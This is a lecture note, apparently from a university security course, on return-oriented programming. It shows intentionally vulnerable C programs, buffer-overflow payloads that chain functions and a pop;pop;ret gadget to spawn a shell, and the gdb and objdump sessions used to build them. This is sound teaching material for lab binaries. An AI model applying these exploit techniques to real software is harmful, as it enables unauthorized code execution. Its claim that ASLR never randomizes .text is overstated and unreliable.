Lec. 23: Gadgets in Return Oriented Programs

1. Return Oriented Programming: Function Chaining Gadgets
2. ROP Gadgets

1 Return Oriented Programming: Function Chaining Gadgets

Return Oriented Programming or (ROP) is the process of using small sequences of code (or gadgets) that are embedded in other code. The "return" portion of the code comes from the fact that these small pieces of code, or gadgets, all end with a return statement. The concept is that while there may be protections in places to stop you from loading shell code, we can leverage the code already within our target program.

As an additional benefit for ROP, similar to the benefit from return-2-libc, is that there a ROP chain is functional even when the stack memory is labeled non-executable and there is memory address randomization. The reason is that we are only going to use already existing code to build an exploit, namely code that is in the .text segment, so it is already labeled executable. Moreover, the .text segment isn't randomized with ASLR, so it will always be consistently in the same place. This means this style of attack is really powerful and really consistent.

Below, we follow an example using of ROP where we use it to properly chain function calls together, but we will also look at an example where the ROP itself, without calling any other function, is capable of launching a shell. Also note, that ll the code we are working with in this lesson are compiled without executable stacks, so we can't easily load shell code ¹.

1.1 Overwriting the return address with function calls

Let's start with a simple example of where ROPs become very useful. Consider the following code where we want bad() to get called

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void bad(){
  printf("You've been PWNED!\n");

}

void vuln(char * s){
  char buf[100];

  strcpy(buf,s);

  printf("Buf: %s\n", buf);
}

void main(int argc, char * argv[]){

    vuln(argv[1]);
}

We know how to solve this one: we overflow the buffer and we overwrite the return the address for vuln() with bad(). To do this, first we can look at the disassembled code to see where the buffer is declared into relation to the return address:

ser@si485H-base:demo$ objdump -d -M intel call_bad
(...)
0804847d <bad>:
 804847d:	55                   	push   ebp
 804847e:	89 e5                	mov    ebp,esp
 8048480:	83 ec 18             	sub    esp,0x18
 8048483:	c7 04 24 70 85 04 08 	mov    DWORD PTR [esp],0x8048570
 804848a:	e8 c1 fe ff ff       	call   8048350 <puts@plt>
 804848f:	c9                   	leave  
 8048490:	c3      
(...)
08048491 <vuln>:
 8048491:	55                   	push   ebp
 8048492:	89 e5                	mov    ebp,esp
 8048494:	81 ec 88 00 00 00    	sub    esp,0x88
 804849a:	8b 45 08             	mov    eax,DWORD PTR [ebp+0x8]
 804849d:	89 44 24 04          	mov    DWORD PTR [esp+0x4],eax
 80484a1:	8d 45 94             	lea    eax,[ebp-0x6c]
 80484a4:	89 04 24             	mov    DWORD PTR [esp],eax
 80484a7:	e8 94 fe ff ff       	call   8048340 <strcpy@plt>
 80484ac:	8d 45 94             	lea    eax,[ebp-0x6c]
 80484af:	89 44 24 04          	mov    DWORD PTR [esp+0x4],eax
 80484b3:	c7 04 24 83 85 04 08 	mov    DWORD PTR [esp],0x8048583
 80484ba:	e8 71 fe ff ff       	call   8048330 <printf@plt>
 80484bf:	c9                   	leave  
 80484c0:	c3                   	ret    
(...)

We see that the buffer is allocated at ebp-0x6c so we can quickly do the exploit like so where we jump to bad():

user@si485H-base:demo$ ./call_bad `python -c "print 'A'*(0x6c+4) + '\x7d\x84\x04\x08'"`
Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}?
You've been PWNED!
Segmentation fault (core dumped)

1.2 Functions with Arguments

We can make the exploit a little more intriguing if we were to make so that bad() will call system() with it's argument:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char pwn[]="/bin/sh";

void bad(char * s){
  printf("You've been PWNED!\n");

  system(s);

}

void vuln(char * s){
  char buf[100];

  strcpy(buf,s);

  printf("Buf: %s\n", buf);
}

void main(int argc, char * argv[]){

    vuln(argv[1]);
}

In this scenario, much like a return-2-libc attack, if we have the stack properly aligned with the right argument, namely pwn, then we'll get a shell to launch. For that to happen, we'll need the exploit on the stack to look like this:

|     <addr pwn>     |
|  bad's ret address |
|     <addr bad>     |

That is, the address of bad overwrites the return address of vuln. The next item in the stack will be bad's return address, which we don't need to worry about; however, the following item is the first argument to bad, which should be pwn.

To complete this exploit, we determine the address of pwn and bad, and give it a go.

user@si485H-base:demo$ gdb -q call_bad_sh
Reading symbols from call_bad_sh...done.
(gdb) x/x pwn
0x804a02c <pwn>:	0x6e69622f
(gdb) x/x bad
0x80484ad <bad>:	0x83e58955
(gdb) quit

user@si485H-base:demo$ ./call_bad_sh `python -c "print 'A'*(0x6c+4) + '\xad\x84\x04\x08' + '\xfe\xbe\xad\xde' + '\x2c\xa0\x04\x08'"`
Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?????,?
You've been PWNED!
$

That's not too bad.

1.3 Chaining Two Functions with Arguments

Let's add a bit more complexity to this exploit. Suppose now we want to make a call to another function first before calling bad(), and the arguments to those functions matter.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char pwn[100];

void bin_sh(int magicbeef){
  if (magicbeef == 0xdeadbeef){
    strcat(pwn,"/bin/sh");
  }
  printf("pwn: %s\n",pwn);

}

void bad(char * s){
  printf("You've been PWNED!\n");

  system(s);

}

void vuln(char * s){
  char buf[100];

  strcpy(buf,s);

  printf("Buf: %s\n", buf);
}

void main(int argc, char * argv[]){
  pwn[0]='\0';
  vuln(argv[1]);
}

This time we need to first call bin_sh() with magicbeef being deadbeef and then we need to call bad() afterwards to get our shell. This might seem like no problem, at first, but once we try it out, you'll see where the challenge arises.

Starting with the easy part, we can look at what the stack should be to properly call bin_sh:

|      0xdeadbeef       |
|  bin_sh's ret address |
|     <addr bin_sh>     |

We overwrite the return address of vuln() with the address of bin_sh() where it's arguments is 0xdeadbeef. Before, in the last example, we didn't consider the return address of the function we jumped to, but this time we have to. What is the next function we call? bad(). So what we really need for the stack is to look like this.

|     <addr pwn>        |
|      0xdeadbeef       |
|     <addr bad>        |
|     <addr bin_sh>     |

If you follow the stack, the argument to bin_sh() is 0xdeadbeef and its return address is bad(). The argument to bad() is pwn, and the return address for bad is 0xdeadbeef, which doesn't matter because at this point we have the shell.

Let's give it a try:

user@si485H-base:demo$ gdb -q call_bad_chain
Reading symbols from call_bad_chain...done.
(gdb) x/x pwn
0x804a060 <pwn>:	0x00000000
(gdb) x/x bad
0x8048505 <bad>:	0x83e58955
(gdb) x/x bin_sh
0x80484ad <bin_sh>:	0x57e58955
(gdb) quit
user@si485H-base:demo$ ./call_bad_chain `python -c "print 'A'*(0x6c+4) + '\xad\x84\x04\x08' +'\x05\x85\x04\x08' +'\xef\xbe\xad\xde' + '\x60\xa0\x04\x08'"`
Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?ﾭ?`?
pwn: /bin/sh
You've been PWNED!
$

It's a shell! Great.

1.4 Chaining Three or More Functions with Arguments

It's about to fall apart. Consider what happens when we need to call another function in this chain. Where could it go? Right now we have this.

|     <addr pwn>        |
|      0xdeadbeef       | <-- bad's return addres is bin_sh's argument
|     <addr bad>        |
|     <addr bin_sh>     |

The slot for bad's return address is already being used for the argument to bin_sh. We're hosed. Worse, consider what would happen in this code example where one of the functions needs to take two arguments:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char pwn[100];

void add_bin(int magiccafe, int magicfood){
  if (magiccafe == 0xcafebabe && magicfood == 0x0badf00d){
    strcat(pwn,"/bin");
  }

  printf("add_bin: pwn: %s\n", pwn);
}


void add_sh(int magicbeef){
  if (magicbeef == 0xdeadbeef){
    strcat(pwn,"/sh");
  }

  printf("add_sh: pwn: %s\n", pwn);
}


void bad(char * s){
  printf("You've been PWNED!\n");

  system(s);

}

void vuln(char * s){
  char buf[100];

  strcpy(buf,s);

  printf("Buf: %s\n", buf);
}

void main(int argc, char * argv[]){
  pwn[0]='\0';
  vuln(argv[1]);
}

Now, the construction of the bin/sh string is in two parts, and one of the functions requires /two arguments. Looks like our luck ran out and this is impossible, but just in case, let's try looking at the stack anyway.

Starting with the first function add_bin and it's two arguments which should be followed by add_sh, we'd need something like this:

|      0x0badf00d      |
|      0xcafebade      |
|      <addr add_sh>   |
|     <addr add_bin>   |

That's possible, but then what happens: we've reached an impasse. add_sh() takes one argument and the way the stack is alligned, that argument is 0x0badf00d. That's just not what we need — we need 0xdeadbeef.

It would seem like this is impossible, but think about what we could do if we were able to clear the stack. Suppose we had a gadget or little function that only did pop;pop;ret then we could jump there instead of add_sh() and clear out the stack before the next return. Something like the following:

|     <addr pwn>         |
|     0xdeadbeef         |
|     <addr bad>         |
|     <addr add_sh>      |
|     0x0badf00d         |
|     0xcafebabe         |
|     <addr pop;pop;ret> |
|     <addr add_bin>     |

If you follow the function chain, after ad_bin() is called with arguments 0xcafebade and 0x0badf00d, the next function to run is a gadget that pops 0xcafebabe and 0x0badf00d off the stack. When the gadget returns, the next address on the stack is add_sh() with the argument 0xdeadbeef. The return address of add_sh() is bad(), and thus the exploit completes.

2 ROP Gadgets

We've been doing a bit of return oriented programming already, but now we really get into it. The big idea was to chain a bunch of functions together through their return address to complete a task. That is a form of return oriented programming, but now we need something different. We need a very specific kind of an expression, a pop;popl;ret which is not a typical function that we can write. How do we find such a thing?

The answer lies in the code itself. While we as programmers of C will never explicitly write a function that is just pop;pop;ret, the C compiler will most certainly compile instructions that contain that sequence of instructions. We describe that sequence as a gadget because it unintentionally gives us the functionality we need, and it ends in a return statement so it can be chained with other function calls.

2.1 Hunting a Gadget

The key now is to hunt down the gadget we need. For that, we can use objdump and grep. For reference the -A option with grep prints the specified number of lines after a match, and the -B option with grep prints the specified number of lines before a match.

user@si485H-base:demo$ objdump -d -M intel call_bad_doublechain | grep -B 3  ret | grep -A 3 pop  
 8048335:	5b                   	pop    ebx
 8048336:	c3                   	ret    
--

--
 8048508:	5f                   	pop    edi
 8048509:	5d                   	pop    ebp
 804850a:	c3                   	ret    
--
 8048556:	83 c4 14             	add    esp,0x14
 8048559:	5f                   	pop    edi
 804855a:	5d                   	pop    ebp
 804855b:	c3                   	ret    
--
 8048571:	89 04 24             	mov    DWORD PTR [esp],eax
--
 804862d:	5e                   	pop    esi
 804862e:	5f                   	pop    edi
 804862f:	5d                   	pop    ebp
 8048630:	c3                   	ret    
--
 804863f:	90                   	nop
--
 8048656:	5b                   	pop    ebx
 8048657:	c3                   	ret

The search terms above looked for any return statement, printing the 3 previous lines. Then the following grep searched for a pop statement, printing the 3 lines after. The result, above, shows us where there is instance of a pop;pop;ret;, at address 0x08048508. What is also important with this gadget is that we don't care to where the data is being popped, to any of the registers is fine, as long as it is being popped off the stack.

2.2 Using the gadget

With this information in place, we can complete the exploit by first identifying the other important address and lining up our stack like below:

|     <addr pwn>         |
|     0xdeadbeef         |
|     <addr bad>         |
|     <addr add_sh>      |
|     0x0badf00d         |
|     0xcafebabe         |
|     <addr pop;pop;ret> |
|     <addr add_bin>     |

We can use gdb to find the other addresses:

user@si485H-base:demo$ gdb -q call_bad_doublechain
Reading symbols from call_bad_doublechain...done.
(gdb) x/x add_bin
0x80484ad <add_bin>:	0x57e58955
(gdb) x/x add_sh
0x804850b <add_sh>:	0x57e58955
(gdb) x/x bad
0x804855c <bad>:	0x83e58955
(gdb) x/x pwn
0x804a060 <pwn>:	0x00000000
(gdb) quit

user@si485H-base:demo$ ./call_bad_doublechain `python -c "s='A'*(0x6c+4); 
s+='\xad\x84\x04\x08'; 
s+='\x08\x85\x04\x08'; 
s+='\xbe\xba\xfe\xca';
s+='\x0d\xf0\xad\x0b';
s+='\x0b\x85\x04\x08';
s+='\x5c\x85\x04\x08';
s+='\xef\xbe\xad\xde';
s+='\x60\xa0\x04\x08';
print s; "`
?uf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA????

 \ﾭ?`?
add_bin: pwn: /bin
add_sh: pwn: /bin/sh
You've been PWNED!
$

2.3 Where do we go from here?

In this example, we used a gadget within the code that did a simple task of chaining functions with different numbers of arguments. What if we were to do something more interesting? What if we were able to find enough gadgets to build a complete exploit? That idea is called ROP exploits, and believe it or not, you can do a complete exploit with shell code using only small gadgets. And, yes, it is as awesome as it sounds!

Footnotes:

Much of the ROP examples are adapted from CodeArcanna article by Alex Reese, Tue 28 May 2013.